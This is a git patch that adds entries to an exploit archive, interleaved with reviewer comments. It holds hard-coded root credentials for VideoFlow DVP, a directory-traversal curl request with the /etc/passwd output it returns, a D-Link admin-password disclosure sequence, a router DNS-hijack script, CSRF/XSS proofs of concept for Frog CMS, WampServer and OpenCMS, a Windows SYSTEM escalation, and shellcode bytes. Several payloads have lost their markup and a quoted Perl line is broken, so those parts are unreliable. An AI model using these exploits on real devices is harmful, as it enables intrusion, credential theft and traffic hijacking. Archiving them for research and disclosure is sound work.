From b6b60b70e914d83b76fd61e041008b01b354d7f0 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 3 Apr 2018 05:01:54 +0000 Subject: [PATCH] DB: 2018-04-03 11 changes to exploits/shellcodes WebLog Expert Enterprise 9.4 - Privilege Escalation Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC) Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC) Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User) WampServer 3.1.1 - Cross-Site Scripting / Cross-Site Request Forgery WampServer 3.1.2 - Cross-Site Request Forgery VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials DLink DIR-601 - Admin Password Disclosure OpenCMS 10.5.3 - Cross-Site Request Forgery OpenCMS 10.5.3 - Cross-Site Scripting Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change --- exploits/hardware/webapps/44387.txt | 91 ++++++++++++++ exploits/hardware/webapps/44388.txt | 179 ++++++++++++++++++++++++++++ exploits/hardware/webapps/44393.sh | 62 ++++++++++ exploits/perl/webapps/44386.txt | 108 +++++++++++++++++ exploits/php/webapps/44383.html | 58 +++++++++ exploits/php/webapps/44384.txt | 51 ++++++++ exploits/php/webapps/44385.html | 47 ++++++++ exploits/php/webapps/44391.html | 73 ++++++++++++ exploits/php/webapps/44392.txt | 51 ++++++++ exploits/windows/local/44382.py | 1 - exploits/windows/local/44389.txt | 49 ++++++++ files_exploits.csv | 14 ++- 12 files changed, 781 insertions(+), 3 deletions(-) create mode 100644 exploits/hardware/webapps/44387.txt create mode 100644 exploits/hardware/webapps/44388.txt create mode 100755 exploits/hardware/webapps/44393.sh create mode 100644 exploits/perl/webapps/44386.txt create mode 100644 exploits/php/webapps/44383.html create mode 100644 exploits/php/webapps/44384.txt create mode 100644 exploits/php/webapps/44385.html create mode 100644 exploits/php/webapps/44391.html create 
mode 100644 exploits/php/webapps/44392.txt create mode 100644 exploits/windows/local/44389.txt diff --git a/exploits/hardware/webapps/44387.txt b/exploits/hardware/webapps/44387.txt new file mode 100644 index 000000000..873d578bf --- /dev/null +++ b/exploits/hardware/webapps/44387.txt 
@@ -0,0 +1,91 @@ +VideoFlow Digital Video Protection DVP 10 Authenticated Root Remote Code Execution + +Vendor: VideoFlow Ltd. +Product web page: http://www.video-flow.com +Affected version: 2.10 (X-Prototype-Version: 1.6.0.2) + +System = Indicate if the DVP is configured as Protector, Sentinel or Fortress +Version = The Operating System SW version number +Image version = Production Image version + + System: DVP Protector + Version: 1.40.0.15(R) May 5 2015 05:27:05 + Image version: 3.07i + + System: DVP Protector + Version: 1.40.0.15(R) May 5 2015 05:27:05 + Image version: 2.08 + + System: DVP Fortress + Version: 2.10.0.5(R) Jan 7 2018 03:26:35 + Image version: 3.07 + + +Summary: VideoFlow's Digital Video Protection (DVP) product is used by +leading companies worldwide to boost the reliability of IP networks, including +the public Internet, for professional live broadcast. DVP enables broadcast +companies to confidently contribute and distribute live video over IP with +unprecedented levels of service continuity, at a fraction of the cost of +leased lines or satellite links. It accelerates ROI by reducing operational +costs and enabling new revenue streams across a wide variety of markets. + +Desc: The affected device suffers from authenticated remote code execution +vulnerability. Including a CSRF, a remote attacker can exploit this issue +and execute arbitrary system commands granting her system access with root +privileges. 
+ +Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5) + CentOS release 5.10 (Final) (2.6.18-371.el5) + ConfD + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5455 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5455.php + +01.02.2018 + +--- + + +Default credentials (web management): + +admin:admin +oper:oper +private:private +public:public +devel:devel + + +Hard-Coded credentials (ssh): + +root:videoflow +mom:$1$CGgdGXXG$0FmyyKMzcHgkKnUTZi5r./ + + +-------------------------------- > Tools > System > Shell > -------------------------------- +| | +| sh-3.2# id;pwd;uname -a;ls | +| uid=0(root) gid=0(root) | +| /dvp100/confd | +| Linux localhost.localdomain 2.6.18-371.el5 #1 SMP Tue Oct 1 08:37:57 EDT 2013 i6 | +| 86 i686 i386 GNU/Linux | +| aaa_cdb.fxs ietf-inet-types.fxs SNMP-USER-BASED-SM-MIB.fxs | +| authorization.fxs ietf-yang-types.fxs SNMPv2-MIB.fxs | +| browser.log IF-MIB.bin SNMPv2-SMI.fxs | +| community_init.xml IF-MIB.fxs SNMPv2-TC.fxs | +| confd.conf IPV6-TC.fxs SNMP-VIEW-BASED-ACM-MIB.fxs | +| config.web Makefile TRANSPORT-ADDRESS-MIB.fxs | +| docroot SNMP-COMMUNITY-MIB.fxs users.fxs | +| dvp.fxs SNMP-FRAMEWORK-MIB.fxs vacm_init.xml | +| dvp_init.xml SNMP-MPD-MIB.fxs webspec.dat | +| IANAifType-MIB.bin SNMP-NOTIFICATION-MIB.fxs | +| IANAifType-MIB.fxs SNMP-TARGET-MIB.fxs | +| sh-3.2# cat /etc/issue | +| CentOS release 5.10 (Final) | +| Kernel \r on an \m | +| | +-------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/hardware/webapps/44388.txt b/exploits/hardware/webapps/44388.txt new file mode 100644 index 000000000..5a67c8504 --- /dev/null +++ b/exploits/hardware/webapps/44388.txt 
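Review bot: The title of this advisory, "Authenticated Root Remote Code Execution", does not match how the same entry is indexed in files_exploits.csv further down in this commit, where 44387 is described as "VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials"; one of the two should be aligned so the index and the file agree on what is being reported. The "Desc" paragraph also mentions "Including a CSRF" without any further detail anywhere in the file, so either that clause should be dropped or the CSRF component described. Unlike several other entries in this commit (44383, 44384, 44385, 44388), the file has no Solution or mitigation section; a one-line note on whether the vendor was contacted and whether a fixed image version exists would make it usable for defenders. The file is also committed without a trailing newline.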
@@ -0,0 +1,179 @@ +# Exploit Title: DLink DIR-601 Unauthenticated Admin password disclosure +# Google Dork: N/A +# Date: 12/24/2017 +# Exploit Author: Kevin Randall +# Vendor Homepage: https://www.dlink.com +# Software Link: N/A +# Version: Firmware: 2.02NA Hardware Version B1 +# Tested on: Windows 10 + Mozilla Firefox +# CVE : CVE-2018-5708 + +*Been in contact with William Brown CISO of Dlink and disclosed to the vendor* + +1. Description + +Having local access to the network but being unauthenticated to the administrator panel, a user can disclose the built in Admin username/password to access the admin panel + + +2. Proof of Concept +(For proof of concept, the real Admin password is "thisisatest" +Step 1: Access default gateway/router login page + +Step 2: Login with Username Admin and put any random password: (This example the password is test) + +POST /my_cgi.cgi?0.06201226210472943 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Referer: http://192.168.0.1/login_real.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 74 +DNT: 1 +Connection: close + +request=login&admin_user_name=YWRtaW4A&admin_user_pwd=dGVzdA==&user_type=0 + +Step 3: Clear Password that was set: + +POST /my_cgi.cgi?0.06201226210472943 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Referer: http://192.168.0.1/login_real.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 74 +DNT: 1 +Connection: close + +request=login&admin_user_name=YWRtaW4A&admin_user_pwd=&user_type=0 + + +Step 4: The following POST request will come back or a variant: + +POST /my_cgi.cgi?0.322727424911867 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 
+Referer: http://192.168.0.1/back.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 73 +DNT: 1 +Connection: close + +request=no_auth&request=load_settings&table_name=fw_ver&table_name=hw_ver + +Change the request=no_auth to "request=auth" + + +POST /my_cgi.cgi?0.322727424911867 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Referer: http://192.168.0.1/back.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 73 +DNT: 1 +Connection: close + +request=auth&request=load_settings&table_name=fw_ver&table_name=hw_ver + +Step 5: Forward the request: + + + +Step 6: Forward the following request: + +POST /my_cgi.cgi?0.8141419425197141 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Referer: http://192.168.0.1/back.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 20 +DNT: 1 +Connection: close + +request=show_message + + +Step 7: You will then be presented with the following: "Invalid user name or password, please try again" + +Step 8: Click Continue + + + +Step 9: You will see a POST request come back similar to the following: + +POST /my_cgi.cgi?0.12979015154204587 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Referer: http://192.168.0.1/login.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 68 +DNT: 1 +Connection: close + +request=no_auth&request=load_settings&table_name=get_restore_default + +Step 10: Change the parameters "request=no_auth" to "request=auth" and "table_name=get_restore_default" to "table_name=restore_default" + +POST /my_cgi.cgi?0.12979015154204587 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) 
Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Referer: http://192.168.0.1/login.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 68 +DNT: 1 +Connection: close + +request=auth&request=load_settings&table_name=restore_default + + +Step 11: Forward the request: + +Step 12: You will see the following POST request come back or a variant of it: + +POST /my_cgi.cgi?0.5566044428265032 HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Referer: http://192.168.0.1/wizard_default.htm +Content-Type: application/x-www-form-urlencoded +Content-Length: 278 +DNT: 1 +Connection: close + +request=no_auth&request=load_settings&table_name=get_restore_default&table_name=wan_settings&table_name=wan_static&table_name=wan_pppoe&table_name=wan_pptp&table_name=wan_l2tp&table_name=wireless_settings&table_name=admin_user&table_name=time&table_name=fw_ver&table_name=hw_ver + + +Step 13: In BurpSuite, right click on the POST request and choose: "Do Intercept" "Response from this request": + + +Step 14: In XML cleartext, configuration information is obtained including the Admin username and password "thisisatest" + + +HTTP/1.1 200 OK +Content-type: text/xml +Connection: close +Date: Sat, 06 Jan 2018 13:33:26 GMT +Server: lighttpd/1.4.28 +Content-Length: 2414 + +0044:8a:5b:8d:ba:1310.0.0.00.0.0.00.0.0.0150000.0.0.0on_demand300149200.0.0.00.0.0.00.0.0.0on_demand300140000.0.0.00.0.0.00.0.0.0on_demand30014001AlwaysHomeAP3011gn01adminthisisatest12.02NA01Tue, 11 Nov 2014NAB1 + + + + + +3. Solution: +N/A. Unknown as of the moment \ No newline at end of file diff --git a/exploits/hardware/webapps/44393.sh b/exploits/hardware/webapps/44393.sh new file mode 100755 index 000000000..22f446a6e --- /dev/null +++ b/exploits/hardware/webapps/44393.sh 
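Review bot: The evidence in Step 14 is unreadable as committed: the response body after `Content-Length: 2414` is a single run like `0044:8a:5b:8d:ba:1310.0.0.0...adminthisisatest12.02NA...`, which looks like the XML with all of its element tags stripped, so a reader cannot see which element carried the credential or confirm that the body matches the stated length. Either restore the tagged XML (redacting values other than the element demonstrating the disclosure) or replace it with a short sentence naming the relevant element. The "3. Solution: N/A" section could at least record the disclosure status mentioned at the top of the file and whether a firmware newer than 2.02NA addresses it, since that is what a reader of this entry will look for. I cannot tell from this rendering whether the tag loss happened in the commit or in the export of this page, so this should be checked against the repository file.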
@@ -0,0 +1,62 @@ +# +# +# Secutech RiS-11/RiS-22/RiS-33 V5.07.52_es_FRI01 +# Remote DNS Change PoC +# +# Copyright 2018 (c) Todor Donev +# https://ethical-hacker.org/ +# https://facebook.com/ethicalhackerorg +# +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! 
+# +# + + +GET -H "Cookie: admin:language=en; path=/" "http:///goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=&DS2=" 2>/dev/null \ No newline at end of file diff --git a/exploits/perl/webapps/44386.txt b/exploits/perl/webapps/44386.txt new file mode 100644 index 000000000..e7849be95 --- /dev/null +++ b/exploits/perl/webapps/44386.txt 
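Review bot: The file is added with mode 100755 but has no interpreter line, so its first line is a comment rather than `#!/bin/sh`; add the shebang so the executable bit is meaningful. The only command in the script is `GET`, the lwp-request tool from libwww-perl, with `2>/dev/null` appended, which means a missing tool, a DNS failure or a refused connection all produce no output at all; drop the redirection, or test for the tool with `command -v GET >/dev/null || exit 1` before the request. The host and the DS1/DS2 query values in the URL are empty and nothing in the forty-line header says so, so a reader cannot tell whether the file is complete or a template; a one-line comment stating which fields are placeholders would fix that. The header also spends most of its length on a generic description of DNS hijacking and a disclaimer while saying nothing about a fixed firmware version or a mitigation for the device.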
@@ -0,0 +1,108 @@ +VideoFlow Digital Video Protection DVP 10 Authenticated Directory Traversal + +Vendor: VideoFlow Ltd. +Product web page: http://www.video-flow.com +Affected version: 2.10 (X-Prototype-Version: 1.6.0.2) + +System = Indicate if the DVP is configured as Protector, Sentinel or Fortress +Version = The Operating System SW version number +Image version = Production Image version + + System: DVP Protector + Version: 1.40.0.15(R) May 5 2015 05:27:05 + Image version: 3.07i + + System: DVP Protector + Version: 1.40.0.15(R) May 5 2015 05:27:05 + Image version: 2.08 + + System: DVP Fortress + Version: 2.10.0.5(R) Jan 7 2018 03:26:35 + Image version: 3.07 + + +Summary: VideoFlow's Digital Video Protection (DVP) product is used by +leading companies worldwide to boost the reliability of IP networks, including +the public Internet, for professional live broadcast. DVP enables broadcast +companies to confidently contribute and distribute live video over IP with +unprecedented levels of service continuity, at a fraction of the cost of +leased lines or satellite links. It accelerates ROI by reducing operational +costs and enabling new revenue streams across a wide variety of markets. + +Desc: The application suffers from an authenticated arbitrary file disclosure +vulnerability including no session expiration. Input passed via the 'ID' parameter +in several Perl scripts is not properly verified before being used to download +system files. This can be exploited to disclose the contents of arbitrary +files via directory traversal attacks. + +Scripts affected: + +$ grep -rnH "Content-Disposition" . 
+./download.pl:30: print "Content-Disposition:attachment;filename=$ID\n\n"; +./download_xml.pl:23: print "Content-Disposition:attachment;filename=$ID\n\n"; +./downloadmib.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n"; +./downloadFile.pl:30: print "Content-Disposition:attachment;filename=$OUTNAME\n\n"; +./downloadsys.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n"; + +---------------------------------------------------------------------------- +/dvp100/confd/docroot/cgi-bin/downloadsys.pl: +--------------------------------------------- + + 1 #!/usr/bin/perl -wT + 2 # http://www.sitepoint.com/file-download-script-perl/ + 3 + 4 use strict; + 5 use CGI; + 6 use CGI::Carp qw ( fatalsToBrowser ); + 7 my $files_location; + 8 my $query = CGI->new; + 9 my $ID = $query->param('ID'); + 10 my @fileholder; + 11 + 12 $files_location = "/dvp100/confd/docroot/cgi-bin/"; + 13 #$ID = "syslog.tar.gz"; #param('ID'); + 14 + 15 if ($ID eq '') { + 16 + 17 } else { + 18 open(DLFILE, "<$files_location/$ID") || Error('open', 'file'); + 19 @fileholder = ; + 20 close (DLFILE) || Error ('close', 'file'); + 21 print "Content-Type:application/x-download\n"; + 22 print "Content-Disposition:attachment;filename=$ID\n\n"; + 23 print @fileholder; + 24 } + +---------------------------------------------------------------------------- + +Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5) + CentOS release 5.10 (Final) (2.6.18-371.el5) + ConfD + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5454 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5454.php + +01.02.2018 + +--- + + +curl 'http://17.17.17.17/cgi-bin/downloadsys.pl?ID=../../../../etc/passwd' -H Cookie:sessionid=sess3638473331458218 +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin 
+sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +news:x:9:13:news:/etc/news: +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +... +... \ No newline at end of file diff --git a/exploits/php/webapps/44383.html b/exploits/php/webapps/44383.html new file mode 100644 index 000000000..3c9fd6bd2 --- /dev/null +++ b/exploits/php/webapps/44383.html @@ -0,0 +1,58 @@ +# Exploit Title:​​ Cross Site Request Forgery- Frog CMS +# Date: 31-03-2018 +# Exploit Author: Samrat Das +# Contact: http://twitter.com/Samrat_Das93 +# Website: https://securitywarrior9.blogspot.in/ +# Vendor Homepage: https://github.com/philippe/FrogCMS +# Version: 0.9.5 +# CVE : CVE-2018-8908 +# Category: Webapp CMS + + +1. Description + +The application source code is coded in a way which allows malicious HTML +request to be executed without veryifying source of request.This leads to +arbitary execution with malicous request which will lead to the creation of +a privileged user. + +2. Proof of Concept + + Visit the application + Visit the Add Users Page. + Craft an html page with all the details for an admin user creation +and host it on a server + Upon the link being clicked by a logged in admin user, immidiately, +another admin user will get created. + +Exploit Code: + + + +
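Review bot: Line 19 of the quoted downloadsys.pl listing reads `@fileholder = ;`, which is not valid Perl; given the `open(DLFILE, ...)` on line 18 it was almost certainly `@fileholder = <DLFILE>;` and the angle brackets were lost as HTML, so the listing should be restored before the entry is relied on as a reference for the root cause. The listing does show that cause clearly: `$ID` from `$query->param('ID')` is interpolated into `"<$files_location/$ID"` with no canonicalization, and the `-T` taint flag on line 1 does not help because taint checks do not block opening a file for reading. The file has no Solution section; a short one would state the fix the listing points to, namely rejecting any `ID` that is not a plain file name in the intended directory (or resolving the path and checking it is still under `$files_location`) and, since the Desc mentions no session expiration, expiring the `sessionid` cookie. The same `Content-Disposition ... $ID` pattern is listed for download.pl, download_xml.pl and downloadmib.pl, so the note should say the fix applies to all of them.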
+ + + + + + + + +
+ + + + +3. Solution: + +Solution - Fix & Patch: The application code should be configured to +implement anti csrf token to filter malicous HTTP Requests. + + +4. Public Reference with POC and steps: + +http://securitywarrior9.blogspot.in/2018/03/cross-site-request-forgery-frog-cms-cve.html + +Thanks and Regards +Samrat \ No newline at end of file diff --git a/exploits/php/webapps/44384.txt b/exploits/php/webapps/44384.txt new file mode 100644 index 000000000..06c4e0cd7 --- /dev/null +++ b/exploits/php/webapps/44384.txt @@ -0,0 +1,51 @@ + # Exploit Title: WampServer 3.1.1 XSS via CSRF +# Date: 31-03-2018 +# Software Link: http://www.wampserver.com/en/ +# Version: 3.1.1 +# Tested On: Windows 10 +# Exploit Author: Vipin Chaudhary +# Contact: http://twitter.com/vipinxsec +# Website: http://medium.com/@vipinxsec +# CVE: CVE-2018-8732 + + +1. Description + +XSS: cross site scripting via CSRF is remotely exploitable. +http://forum.wampserver.com/read.php?2,138295,150615,page=6#msg-150615 + +http://forum.wampserver.com/read.php?2,150617 + +2. Proof of Concept + + +How to exploit this XSS vulnerability: +1. Go to Add a Virtual host and add one to wampserver. +2. Go to Supress Virtual host and select one to delete and then intercept +the request using burp suite or any other proxy tool +3. Change the value of parameter *virtual_del[] *to "> and forward it then you will see the XSS triggered. + +How to see it: +1. Copy and paste this CSRF request in notepad and save it as anything.html + + +
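Review bot: The "Exploit Code:" section of 44383.html is empty as committed: between that heading and "3. Solution" the hunk contains only blank added lines, so the file describes a CSRF against the Add Users page but carries no form or markup to show what it is about. The same loss of markup is visible in 44384.txt after "save it as anything.html" (only a stray `" />` fragment survives), in 44385.html, in the long run of empty lines in 44391.html, and in 44392.txt where the SVG that the text says to upload is absent; I cannot tell whether the HTML/SVG was stripped in the commit or in the export of this page, so the repository files should be checked and the markup restored where missing. The descriptions in these files also have a few typos (veryifying, arbitary, malicous, immidiately, Supress) that could be corrected at the same time.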
+ " +/> + + + + + +Warning: action="[localhost] is action=' +http://localhost/add_vhost.php?lang=english' replacing simple quotes(') by +double quote("[image: winking smiley] + + +3. Solution: + +Update to version 3.1.3 +http://www.wampserver.com/en/#download-wrapper \ No newline at end of file diff --git a/exploits/php/webapps/44385.html b/exploits/php/webapps/44385.html new file mode 100644 index 000000000..defe8a9ab --- /dev/null +++ b/exploits/php/webapps/44385.html @@ -0,0 +1,47 @@ +# Exploit Title: WampServer 3.1.2 CSRF to add or delete any virtual hostsremotely +# Date: 31-03-2018 +# Software Link: http://www.wampserver.com/en/ +# Version: 3.1.2 +# Tested On: Windows 10 +# Exploit Author: Vipin Chaudhary +# Contact: http://twitter.com/vipinxsec +# Website: http://medium.com/@vipinxsec +# CVE: CVE-2018-8817 + + +1. Description + +CSRF (Cross site request forgery) in WampServer 3.1.2 which allows a remote +attacker to force any victim to add or delete virtual hosts. + +http://forum.wampserver.com/read.php?2,138295,150722,page=6#msg-150722 + +2. Proof of Concept + +How to exploit this CSRF vulnerability: +1. Go to Add a Virtual host and add one to wampserver. +2. Now intercept the request with proxy tool like burp suite. +3. Now make a CSRF PoC of the request and to exploit you can host it on +internet and send the link to the victim. + +*Exploit Code for deleting any host remotely:* + +1. Copy and paste this CSRF request in notepad and save it as anything.html + + +
+ + +
+ + + +2. Then run it on your installed vulnerable wampserver. + +3. Solution: + +Update to version 3.1.3 +http://www.wampserver.com/en/#download-wrapper \ No newline at end of file diff --git a/exploits/php/webapps/44391.html b/exploits/php/webapps/44391.html new file mode 100644 index 000000000..5fc09a7f5 --- /dev/null +++ b/exploits/php/webapps/44391.html @@ -0,0 +1,73 @@ +# Exploit Title: OpenCMS 10.5.3 Multiple Cross Site Request Forgery Vulnerabilities +Injection +# Google Dork: N/A +# Date: 02-04-2018 +####################################### +# Exploit Author: Sureshbabu Narvaneni +# Author Blog : http://nullnews.in +# Vendor Homepage: http://www.opencms.org/en/ +# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=a7747cd0-b27b-11e7-8299-7fde8b0295e1 +# Affected Version: 10.5.3 +# Category: WebApps +# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686 +# CVE : CVE-2018-8811 + +1. Vendor Description: + +OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently. + +2. Technical Description: + +Cross-site request forgery (CSRF) vulnerability in system/workplace/admin/accounts/user_role.jsp in OpenCMS 10.5.3 allows remote attackers to hijack the authentication of administrative users for requests that perform privilege escalation. + +3. Proof Of Concept: + +a) Send below crafted request to logged in user who is having Root Administrator level access. + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +b) Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully. + +c) By leveraging this vulnerability user can gain Root Level Administrator Access to the CMS. + + +4. Solution: + +Upgrade to latest release. +http://www.opencms.org/en/home/news.html + +5. Reference: +https://github.com/alkacon/opencms-core/issues/586 +http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-8811 \ No newline at end of file diff --git a/exploits/php/webapps/44392.txt b/exploits/php/webapps/44392.txt new file mode 100644 index 000000000..449624ad2 --- /dev/null +++ b/exploits/php/webapps/44392.txt 
@@ -0,0 +1,51 @@ +# Exploit Title: OpenCMS 10.5.3 Stored Cross Site Scripting Vulnerability +# Google Dork: N/A +# Date: 02-04-2018 +####################################### +# Exploit Author: Sureshbabu Narvaneni +# Author Blog : http://nullnews.in +# Vendor Homepage: http://www.opencms.org/en/ +# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=a7747cd0-b27b-11e7-8299-7fde8b0295e1 +# Affected Version: 10.5.3 +# Category: WebApps +# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686 +# CVE : CVE-2018-8815 + +1. Vendor Description: + +OpenCms from Alkacon Software is a professional, easy to use website +content management system. OpenCms helps content managers worldwide to +create and maintain beautiful websites fast and efficiently. + +2. Technical Description: + +Cross-site scripting (XSS) vulnerability in the gallery function in Alkacon +OpenCMS 10.5.3 allows remote attackers to inject arbitrary web script or +HTML via a malicious SVG image. + +3. Proof Of Concept: + +a) Login as user who is having Gallery Editor role. +b) Navigate to gallery and upload below svg file. + + + + + + + +c) Once other user who is having Root Administrator permissions visited the +image link or viewed the uploaded svg image the script get executed. + +4. Solution: + +Upgrade to latest release. +http://www.opencms.org/en/home/news.html + +5. Reference: +https://github.com/alkacon/opencms-core/issues/587 +http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-8815 \ No newline at end of file diff --git a/exploits/windows/local/44382.py b/exploits/windows/local/44382.py index 64a4dc85a..b026006a7 100755 --- a/exploits/windows/local/44382.py +++ b/exploits/windows/local/44382.py 
@@ -16,7 +16,6 @@ After hitting enter new device, click Enter device manually #!/usr/bin/python import socket -# Create an array of buffers, from 1 to 5900, with increments of 200. calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" diff --git a/exploits/windows/local/44389.txt b/exploits/windows/local/44389.txt new file mode 100644 index 000000000..5985915f7 --- /dev/null +++ b/exploits/windows/local/44389.txt 
@@ -0,0 +1,49 @@ +Exploit Author: bzyo +Twitter: @bzyo_ +Exploit Title: WebLog Expert Enterprise 9.4 - Privilege Escalation +Date: 03-31-2018 +Vulnerable Software: WebLog Expert Enterprise 9.4 +Vendor Homepage: https://www.weblogexpert.com/ +Version: 9.4 +Software Link: https://www.weblogexpert.com/download.htm +Tested On: Windows 7 x86 and x64 + + +Details: +By default WebLog Expert Enterprise 9.4 runs scheduled tasks under Local System account. +If WebLog Expert Schedule Service is installed by an administrator, regular users have the +ability to run tasks as Local System. + + +Exploit: +1. Login as regular user where WebLog Expert and WebLog Expert Schedule Service are installed + +2. Open WebLog Expert and then Schedule + +3. Select Add, Next, choose 'Sample - HTML' under Profile, Next + +4. Check 'Run command...' box, fill in 'Command' and 'Run in' as listed below + Command: C:\Windows\System32\cmd.exe + Run in: C:\Windows\System32\ + +5. Select Next, Finish, Highlight New Task, select Run Now + +6. Pop-up will appear in taskbar that reads 'A program running on this computer is trying to display a message' + +7. Select 'View the message' + +8. Command prompt is shown + C:\Windows\system32>whoami + nt authority\system + +Prerequisites: +To successfully exploit this vulnerability, an attacker must already have access +to a system running WebLog Expert and WebLog Expert Schedule Service using a +low-privileged user account + +Risk: +The vulnerability allows local attackers to escalate privileges and execute +arbitrary code as Local System aka Game Over. + +Fix: +Under Schedule Options, change default account that runs scheduled tasks \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c88125e92..6091a6dfd 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
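Review bot: The "Fix:" section gives only a local workaround, `Under Schedule Options, change default account that runs scheduled tasks`, and does not say whether the vendor was notified or whether any release after 9.4 changes the default, which the WampServer and OpenCMS entries in this commit do record; adding that status line would make the entry actionable for administrators. The "Details" paragraph and the "Prerequisites" paragraph state the same precondition (an installed Schedule Service and a low-privileged local user) twice and could be merged. The file is committed without a trailing newline.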
@@ -9626,6 +9626,7 @@ id,file,description,date,author,type,platform,port
 44364,exploits/windows/local/44364.py,"Allok Video Joiner 4.6.1217 - Stack-Based Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
 44365,exploits/windows/local/44365.py,"Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
